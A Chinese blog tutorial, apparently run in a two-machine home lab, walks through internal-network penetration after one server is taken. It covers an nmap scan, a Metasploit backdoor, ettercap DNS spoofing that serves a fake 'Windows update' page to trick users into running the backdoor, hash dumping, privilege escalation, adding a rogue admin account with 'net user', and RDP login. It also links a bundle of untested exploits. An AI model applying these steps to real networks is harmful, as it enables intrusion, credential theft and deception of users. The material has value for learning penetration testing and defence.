注册 登录
  • 用人不在于如何减少人的短处, 而在于如何发挥人的长处@彼得.德鲁克 (管理学之父)

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

渗透技巧 top999 来源:小爱_Joker 118次浏览 1890字 0个评论

本机ubuntu IP:192.168.0.3

虚拟机03主机 IP:192.168.0.128

我们先来模拟一下 比如我拿到了我本机192.168.0.3 这台服务器的管理权限后 我是如何继续渗透192.168.0.128这台主机的首先在内网渗透中最常用的就是信息收集以及端口扫描说起端口扫描和主机信息收集 大家不得不想到了nmap

nmap

nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。

正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。

Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。

Nmap 在黑客帝国(The Matrix)中,连同SSH1的32位元循环冗余校验漏洞,被崔妮蒂用以入侵发电站的能源管理系统。

另外更多nmap相关信息 请到百度百科查看 太多 全搬过来的话 界面就不是特别美观了http://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq

我们用nmap的Intense scan模块 来扫描 192.168.0.128 这台主机 是在内网中 扫描端口开放信息以及主机信息等一系列信息~ Intense scan 模块可以满足一般的扫描 如果你要扫描内网主机的话 nmap 192.168.0.1/24 即可 192.168.0.1 是我的路由器地址

nmap -T4 -A -v 192.168.0.128

这里我们不得不说一下 nmap确实很强大 下面为输出结果

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

我们得知主机系统为 Windows2003 用户组 版本信息 端口信息 开放了3389当然 nmap有很多插件 可以扫描主机漏洞问题 那个我没找到= =

咳咳配置Metasploit exe后门

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

ps:默认端口4444

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

有的主机可以配合Metasploit溢出渗透xp 那样直接获取到一个cmd执行权限 本台主机我看了下 没有远程溢出问题 补丁都打好了。

主机开放3389 后 而且是在内网 那么我们dns欺骗 内网全部主机的dns 我们写一个html界面 提示你电脑存在xx漏洞 打补丁 后门改名字可以改为 Windows update.exe html界面越逼真越好。

ettercap -T -i wlp2s0 -q -P dns_spoof /// ///

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

下面为输出结果参数问题:

-T文本模式 -i接要欺骗的适配器 -q安静模式 -P dns_spoof调用这个插件 /// ///代表所有IP和子网掩码

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

对方主机打开任何网站 都会成为我本机的index.html

Linux的 index.html在/var/www/html/目录

直接gedit /var/www/html/index.html 即可编辑

首先你要先进入root状态

不然只能读 不能写

上面说了 03主机是受害者 这里我假装上当了

打开了后门

这里我们的msf上线了

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

帮助信息

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

首先我们先来读取下192.168.0.128这台主机的hash数值

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

当然 这些数值不好解密 咳咳

有提权exp 可以直接显示hash值 解密后的

getsystem 获取最高权限

shell 进入cmd提权

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

我们成功获取到了最高权限 进入到了c盘 Windows system32的cmd.exe直接一条命令 即可添加用户&管理员权限

net user xaisec xaisec /add & net localgroup administrators xaisec /add

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

连接192.168.0.128 这台主机 rdesktop

没有rdesktop的 可以apt-get install rdesktop 安装

rdesktop -h 参数

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

rdesktop 192.168.0.128 -u xaisec -p xaisec

-u 是用户名的意思 -p是密码

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

读取解密哈希值

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

hash下

administrator admin

xaisec xaisec

使用administrator登录

rdesktop 192.168.0.128 -u administrator -p admin

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

【内网安全】假如拿到一个服务器之后如何再进行内网渗透?

最后 我整理了下提权exp 有的没有测试 不清楚有没有后门自行检查

链接: http://pan.baidu.com/s/1i56zH0T 密码: qdhm


T1op|T1op.com , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明【内网安全】假如拿到一个服务器之后如何再进行内网渗透?
喜欢 (2)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址